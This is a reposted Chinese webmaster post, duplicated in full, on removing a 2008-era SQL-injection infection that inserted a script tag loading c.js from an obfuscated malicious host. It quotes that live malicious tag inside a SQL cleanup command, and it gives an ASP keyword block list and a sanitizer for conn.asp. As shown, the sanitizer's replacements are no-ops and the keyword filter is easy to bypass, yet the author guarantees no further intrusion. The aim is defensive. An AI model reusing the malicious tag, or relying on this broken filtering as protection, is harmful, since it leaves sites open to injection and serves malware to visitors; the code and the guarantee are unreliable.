帮助网站站长解决最近流行的com/css/c.js注入问题
2009-04-24 14:43
447 查看
帮助网站站长解决最近流行的com/css/c.js注入问题! - zifanqd 2008-12-08 19:23
我找了很多人,但是都没有给我解决掉。骗子太多了。
现在我站出来,希望能帮助大家解决掉问题,如果你的站也跟我说的一样,请按照我的文字做
下去。
最终还是通过自己写的代码解决了问题。
SQL注入问题,com/css/c.js病毒的清除方法。
最近流行的病毒SQL代码:Script Src=http://c.nu%63%6Cear3.com/css/c.js>
现已找到解决办法。
暂时清除的办法可以使用如下命令:
update 表名 set 表项=replace(cast(表项 as varchar(8000)),’病毒代码段’,’’)
如下我写的一段标准的:
update hezu set Xiaoqm=replace(cast(Xiaoqm as varchar(8000)),' <Script
Src=http://c.nu%63%6Cear3.com/css/c.js> </Script>','')
这个可以回车换行后,多条一起执行的。
在查询分析器中执行即可。
直接的清除方法,需要在CONN.ASP中加入:
如下代码:
<%
function tabConvert(str)
dim tempstr
dim theStr
dim canConvert
dim theChr
tempStr=str
theChr=""
theStr=""
canConvert=1
for i=1 to len(tempStr)
theChr=mid(tempStr,i,1)
if theChr=" <" then
canConvert=0
end if
if theChr=">" then
canConvert=1
end if
if theChr=" " and canConvert=1 then
theChr= " "
end if
theStr=theStr&theChr
next
theStr=replace(theStr,chr(13)," <br>")
tabConvert=theStr
End function
%>
<%
Dim Fy_Url,Fy_a,Fy_x,Fy_Cs(),Fy_Cl,Fy_Ts,Fy_Zx
Fy_Cl = 3 '
Fy_Zx = "http://www.1jia.cc" '
On Error Resume Next
Fy_Url=Request.ServerVariables("QUERY_STRING")
Fy_a=split(Fy_Url,"&")
redim Fy_Cs(ubound(Fy_a))
On Error Resume Next
for Fy_x=0 to ubound(Fy_a)
Fy_Cs(Fy_x) = left(Fy_a(Fy_x),instr(Fy_a(Fy_x),"=")-1)
Next
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x) <>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'") <>0 or Instr(LCase(Request(Fy_Cs
(Fy_x))),"and") <>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select") <>0 or Instr
(LCase(Request(Fy_Cs(Fy_x))),"update") <>0 or Instr(LCase(Request(Fy_Cs
(Fy_x))),"chr") <>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from") <>0 or
Instr(LCase(Request(Fy_Cs(Fy_x))),";") <>0 or Instr(LCase(Request(Fy_Cs
(Fy_x))),"insert") <>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid") <>0 Or Instr
(LCase(Request(Fy_Cs(Fy_x))),"master.") <>0 Then
Select Case Fy_Cl
Case "1"
Response.Write " <Script Language=JavaScript>alert(' oh "&Fy_Cs(Fy_x)&" wrong!/n/n
please not:and,select,update,insert,delete,chr !/n/nNot SQL,go
out!');window.close(); </Script>"
Case "2"
Response.Write " <Script Language=JavaScript>location.href='"&Fy_Zx&"' </Script>"
Case "3"
Response.Write " <Script Language=JavaScript>alert(' go out!go out "&Fy_Cs(Fy_x)
&"go out!/n/n go out:,and,select,update,insert,delete,chr go out!/n/ngo
out!');location.href='"&Fy_Zx&"'; </Script>"
End Select
Response.End
End If
End If
Next
%>
<%
Function Checkstr(Str)
If Isnull(Str) Then
CheckStr = ""
Exit Function
End If
Str = Replace(Str,Chr(0),"", 1, -1, 1)
Str = Replace(Str," <"," <", 1, -1, 1)
Str = Replace(Str,">",">", 1, -1, 1)
Str = Replace(Str, "script", "script", 1, -1, 0)
Str = Replace(Str, "SCRIPT", "SCRIPT", 1, -1, 0)
Str = Replace(Str, "Script", "Script", 1, -1, 0)
Str = Replace(Str, "script", "Script", 1, -1, 1)
Str = Replace(Str, "object", "object", 1, -1, 0)
Str = Replace(Str, "OBJECT", "OBJECT", 1, -1, 0)
Str = Replace(Str, "Object", "Object", 1, -1, 0)
Str = Replace(Str, "object", "Object", 1, -1, 1)
Str = Replace(Str, "applet", "applet", 1, -1, 0)
Str = Replace(Str, "APPLET", "APPLET", 1, -1, 0)
Str = Replace(Str, "Applet", "Applet", 1, -1, 0)
Str = Replace(Str, "applet", "Applet", 1, -1, 1)
Str = Replace(Str, "[", "[")
Str = Replace(Str, "]", "]")
Str = Replace(Str, """", "", 1, -1, 1)
Str = Replace(Str, "=", "=", 1, -1, 1)
Str = Replace(Str, "'", "''", 1, -1, 1)
Str = Replace(Str, "select", "select", 1, -1, 1)
Str = Replace(Str, "execute", "execute", 1, -1, 1)
Str = Replace(Str, "exec", "exec", 1, -1, 1)
Str = Replace(Str, "join", "join", 1, -1, 1)
Str = Replace(Str, "union", "union", 1, -1, 1)
Str = Replace(Str, "where", "where", 1, -1, 1)
Str = Replace(Str, "insert", "insert", 1, -1, 1)
Str = Replace(Str, "delete", "delete", 1, -1, 1)
Str = Replace(Str, "update", "update", 1, -1, 1)
Str = Replace(Str, "like", "like", 1, -1, 1)
Str = Replace(Str, "drop", "drop", 1, -1, 1)
Str = Replace(Str, "create", "create", 1, -1, 1)
Str = Replace(Str, "rename", "rename", 1, -1, 1)
Str = Replace(Str, "count", "count", 1, -1, 1)
Str = Replace(Str, "chr", "chr", 1, -1, 1)
Str = Replace(Str, "mid", "mid", 1, -1, 1)
Str = Replace(Str, "truncate", "truncate", 1, -1, 1)
Str = Replace(Str, "nchar", "nchar", 1, -1, 1)
Str = Replace(Str, "char", "char", 1, -1, 1)
Str = Replace(Str, "alter", "alter", 1, -1, 1)
Str = Replace(Str, "cast", "cast", 1, -1, 1)
Str = Replace(Str, "exists", "exists", 1, -1, 1)
Str = Replace(Str,Chr(13)," <br>", 1, -1, 1)
CheckStr = Replace(Str,"'","''", 1, -1, 1)
End Function
%>
好了,如果你还有不明白的,可以联系我QQ:528407
保证你不再被入侵。
我找了很多人,但是都没有给我解决掉。骗子太多了。
现在我站出来,希望能帮助大家解决掉问题,如果你的站也跟我说的一样,请按照我的文字做
下去。
最终还是通过自己写的代码解决了问题。
SQL注入问题,com/css/c.js病毒的清除方法。
最近流行的病毒SQL代码:Script Src=http://c.nu%63%6Cear3.com/css/c.js>
现已找到解决办法。
暂时清除的办法可以使用如下命令:
update 表名 set 表项=replace(cast(表项 as varchar(8000)),’病毒代码段’,’’)
如下我写的一段标准的:
update hezu set Xiaoqm=replace(cast(Xiaoqm as varchar(8000)),' <Script
Src=http://c.nu%63%6Cear3.com/css/c.js> </Script>','')
这个可以回车换行后,多条一起执行的。
在查询分析器中执行即可。
直接的清除方法,需要在CONN.ASP中加入:
如下代码:
<%
function tabConvert(str)
dim tempstr
dim theStr
dim canConvert
dim theChr
tempStr=str
theChr=""
theStr=""
canConvert=1
for i=1 to len(tempStr)
theChr=mid(tempStr,i,1)
if theChr=" <" then
canConvert=0
end if
if theChr=">" then
canConvert=1
end if
if theChr=" " and canConvert=1 then
theChr= " "
end if
theStr=theStr&theChr
next
theStr=replace(theStr,chr(13)," <br>")
tabConvert=theStr
End function
%>
<%
Dim Fy_Url,Fy_a,Fy_x,Fy_Cs(),Fy_Cl,Fy_Ts,Fy_Zx
Fy_Cl = 3 '
Fy_Zx = "http://www.1jia.cc" '
On Error Resume Next
Fy_Url=Request.ServerVariables("QUERY_STRING")
Fy_a=split(Fy_Url,"&")
redim Fy_Cs(ubound(Fy_a))
On Error Resume Next
for Fy_x=0 to ubound(Fy_a)
Fy_Cs(Fy_x) = left(Fy_a(Fy_x),instr(Fy_a(Fy_x),"=")-1)
Next
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x) <>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'") <>0 or Instr(LCase(Request(Fy_Cs
(Fy_x))),"and") <>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select") <>0 or Instr
(LCase(Request(Fy_Cs(Fy_x))),"update") <>0 or Instr(LCase(Request(Fy_Cs
(Fy_x))),"chr") <>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from") <>0 or
Instr(LCase(Request(Fy_Cs(Fy_x))),";") <>0 or Instr(LCase(Request(Fy_Cs
(Fy_x))),"insert") <>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid") <>0 Or Instr
(LCase(Request(Fy_Cs(Fy_x))),"master.") <>0 Then
Select Case Fy_Cl
Case "1"
Response.Write " <Script Language=JavaScript>alert(' oh "&Fy_Cs(Fy_x)&" wrong!/n/n
please not:and,select,update,insert,delete,chr !/n/nNot SQL,go
out!');window.close(); </Script>"
Case "2"
Response.Write " <Script Language=JavaScript>location.href='"&Fy_Zx&"' </Script>"
Case "3"
Response.Write " <Script Language=JavaScript>alert(' go out!go out "&Fy_Cs(Fy_x)
&"go out!/n/n go out:,and,select,update,insert,delete,chr go out!/n/ngo
out!');location.href='"&Fy_Zx&"'; </Script>"
End Select
Response.End
End If
End If
Next
%>
<%
Function Checkstr(Str)
If Isnull(Str) Then
CheckStr = ""
Exit Function
End If
Str = Replace(Str,Chr(0),"", 1, -1, 1)
Str = Replace(Str," <"," <", 1, -1, 1)
Str = Replace(Str,">",">", 1, -1, 1)
Str = Replace(Str, "script", "script", 1, -1, 0)
Str = Replace(Str, "SCRIPT", "SCRIPT", 1, -1, 0)
Str = Replace(Str, "Script", "Script", 1, -1, 0)
Str = Replace(Str, "script", "Script", 1, -1, 1)
Str = Replace(Str, "object", "object", 1, -1, 0)
Str = Replace(Str, "OBJECT", "OBJECT", 1, -1, 0)
Str = Replace(Str, "Object", "Object", 1, -1, 0)
Str = Replace(Str, "object", "Object", 1, -1, 1)
Str = Replace(Str, "applet", "applet", 1, -1, 0)
Str = Replace(Str, "APPLET", "APPLET", 1, -1, 0)
Str = Replace(Str, "Applet", "Applet", 1, -1, 0)
Str = Replace(Str, "applet", "Applet", 1, -1, 1)
Str = Replace(Str, "[", "[")
Str = Replace(Str, "]", "]")
Str = Replace(Str, """", "", 1, -1, 1)
Str = Replace(Str, "=", "=", 1, -1, 1)
Str = Replace(Str, "'", "''", 1, -1, 1)
Str = Replace(Str, "select", "select", 1, -1, 1)
Str = Replace(Str, "execute", "execute", 1, -1, 1)
Str = Replace(Str, "exec", "exec", 1, -1, 1)
Str = Replace(Str, "join", "join", 1, -1, 1)
Str = Replace(Str, "union", "union", 1, -1, 1)
Str = Replace(Str, "where", "where", 1, -1, 1)
Str = Replace(Str, "insert", "insert", 1, -1, 1)
Str = Replace(Str, "delete", "delete", 1, -1, 1)
Str = Replace(Str, "update", "update", 1, -1, 1)
Str = Replace(Str, "like", "like", 1, -1, 1)
Str = Replace(Str, "drop", "drop", 1, -1, 1)
Str = Replace(Str, "create", "create", 1, -1, 1)
Str = Replace(Str, "rename", "rename", 1, -1, 1)
Str = Replace(Str, "count", "count", 1, -1, 1)
Str = Replace(Str, "chr", "chr", 1, -1, 1)
Str = Replace(Str, "mid", "mid", 1, -1, 1)
Str = Replace(Str, "truncate", "truncate", 1, -1, 1)
Str = Replace(Str, "nchar", "nchar", 1, -1, 1)
Str = Replace(Str, "char", "char", 1, -1, 1)
Str = Replace(Str, "alter", "alter", 1, -1, 1)
Str = Replace(Str, "cast", "cast", 1, -1, 1)
Str = Replace(Str, "exists", "exists", 1, -1, 1)
Str = Replace(Str,Chr(13)," <br>", 1, -1, 1)
CheckStr = Replace(Str,"'","''", 1, -1, 1)
End Function
%>
好了,如果你还有不明白的,可以联系我QQ:528407
保证你不再被入侵。
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 防止最近流行的com/css/c.js注入的解决方法
- [Filter过滤器]解决缓存网站图片,css,js等问题
- 如何解决网站页面CSS、JS脚本在浏览器的缓存问题
- 【转载】----web网站css,js更新后客户浏览器缓存问题,需要刷新才能正常展示的解决办法
- Nginx 安装及配置负载均衡https网站及转发后页面js、css等路径找不到问题解决
- 解决CSS、JS文件更新网站效果却没实时更新的问题
- web网站css,js更新后客户浏览器缓存问题,需要刷新才能正常展示的解决办法
- 【转载】web网站css,js更新后客户浏览器缓存问题,需要刷新才能正常展示的解决办法
- web网站css,js更新后客户浏览器缓存问题,需要刷新才能正常展示的解决办法
- web网站css,js更新后客户浏览器缓存问题,需要刷新才能正常展示的解决办法
- web网站css,js更新后客户浏览器缓存问题,需要刷新才能正常展示的解决办法
- jsp 网站引入外部css或者js失效问题解决
- 关于Jetty锁定静态文件如JS,css外联文件的问题解决办法.;修改后不需要每次重启jetty服务器.适合window系统
- Effective前端1:能使用html/css解决的问题就不要使用JS
- 【原创】cs+html+js+css模式(七): 顺序执行与并发执行问题,IIS7及其以上版本的抛错问题解决
- jsp中使用随机数解决js、css缓存问题
- 解决MVC中使用BundleConfig.RegisterBundles引用Css及js文件发布后丢失的问题
- HTML+CSS:临摹电商网站解决兼容性问题以及心得
- mvn jetty:run无法修改js css文件问题的解决
- Nginx下Django Admin界面Css、JS丢失问题解决方法